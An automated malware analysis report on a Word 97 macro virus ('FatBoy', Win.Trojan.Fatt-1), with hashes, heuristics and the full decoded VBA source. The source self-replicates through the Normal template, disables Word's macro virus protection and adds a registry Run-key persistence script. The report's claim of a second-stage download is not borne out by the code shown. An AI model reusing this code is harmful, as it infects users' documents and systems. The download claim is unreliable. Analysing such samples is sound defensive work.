Win.Trojan.Fatt-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 e7eee22eb12c8f4a…

MALICIOUS

Office (OLE)

Size: 36.5 KB
Created: 1997-10-02 10:21:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 18afacf3d11fe8b4e300392839a1a7c2
SHA-1: 6ad99995b0cdd8fbca349b99a7567ebb9b05a99e
SHA-256: e7eee22eb12c8f4ae6f5fa5c76798f5f3d1ad979c7a85e90cf6c6a57a452c43d
Risk Score: 228

Malware Insights

Win.Trojan.Fatt-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1105 Ingress Tool Transfer

The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for malicious Office documents. The script attempts to write a file named 'Msfat.sys' and a VBScript 'Msfat.sys.vbs' to the system directory. It also creates a registry Run key pointing to the VBScript, indicating an attempt to establish persistence and download a second-stage payload.

Heuristics (5)

  • ClamAV: Win.Trojan.Fatt-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Fatt-1
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched lines in script:
      Open "C:\WINDOWS\SYSTEM\Msfat.sys.vbs" For Output As #1
       Print #1, "Set fatty = WScript.CreateObject(""Word.Application"")"
       Print #1, "fatty.Options.VirusProtection = 0"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched lines in script:
      Attribute VB_Customizable = True
      Private Sub Document_Open()
       On Error Resume Next

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2847 bytes
SHA-256: f18c6dbd406e26dfb10325d1de612a4fab877886c9cbad2908c9eab7493613aa
Detection
ClamAV: Doc.Trojan.Fatt-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "FatBoy"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
 On Error Resume Next
  Const a = "FatBoy"
  Const b = "c:\WINDOWS\SYSTEM\Msfat.sys"
  Set Code = New DataObject
  With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: .ConfirmConversions = 0: End With
    Code.SetText FatBoy.VBProject.VBComponents(1).CodeModule.Lines(1, FatBoy.VBProject.VBComponents(1).CodeModule.CountOfLines)
    Open b For Output As #1: Print #1, Code.GetText: Close #1
    If ActiveDocument.VBProject.VBComponents(1).Name <> a Then
      Set fatt = ActiveDocument.VBProject.VBComponents(1)
      saveme = True
     ElseIf NormalTemplate.VBProject.VBComponents(1).Name <> a Then
      Set fatt = NormalTemplate.VBProject.VBComponents(1)
      repla = True
    End If
    If fatt.CodeModule.CountOfLines > 0 Then fatt.CodeModule.DeleteLines 1, fatt.CodeModule.CountOfLines
      fatt.CodeModule.AddFromFile b
      fatt.Name = a
    If saveme = True Then
     ActiveDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine 26, "Sub stealth()"
     ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
    ElseIf repla = True Then
     NormalTemplate.VBProject.VBComponents(1).CodeModule.ReplaceLine 26, "Sub ViewVBCode()"
    End If
End Sub
Sub stealth()
  System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "") = "C:\WINDOWS\SYSTEM\Msfat.sys.vbs"
  Open "C:\WINDOWS\SYSTEM\Msfat.sys.vbs" For Output As #1
   Print #1, "Set fatty = WScript.CreateObject(""Word.Application"")"
   Print #1, "fatty.Options.VirusProtection = 0"
   Print #1, "fatty.Options.SaveNormalPrompt = 0"
   Print #1, "Set fatt = fatty.NormalTemplate.VBProject.VBComponents(1)"
   Print #1, "If fatt.Name <> ""FatBoy"" then"
   Print #1, "fatt.CodeModule.DeleteLines 1, fatt.codemodule.CountOfLines"
   Print #1, "fatt.CodeModule.AddFromFile (""C:\WINDOWS\SYSTEM\Msfat.sys"")"
   Print #1, "fatt.name = ""FatBoy"""
   Print #1, "end if"
  Close #1
 If ActiveDocument.VBProject.VBComponents(1).Name = "FatBoy" Then
      ActiveDocument.VBProject.VBComponents(1).Name = "ThisDocument"
      ActiveDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
 End If
 If NormalTemplate.VBProject.VBComponents(1).Name = "FatBoy" Then
      NormalTemplate.VBProject.VBComponents(1).Name = "ThisDocument"
      NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
 End If
End Sub
' WM97.FatBoy - Psyclone X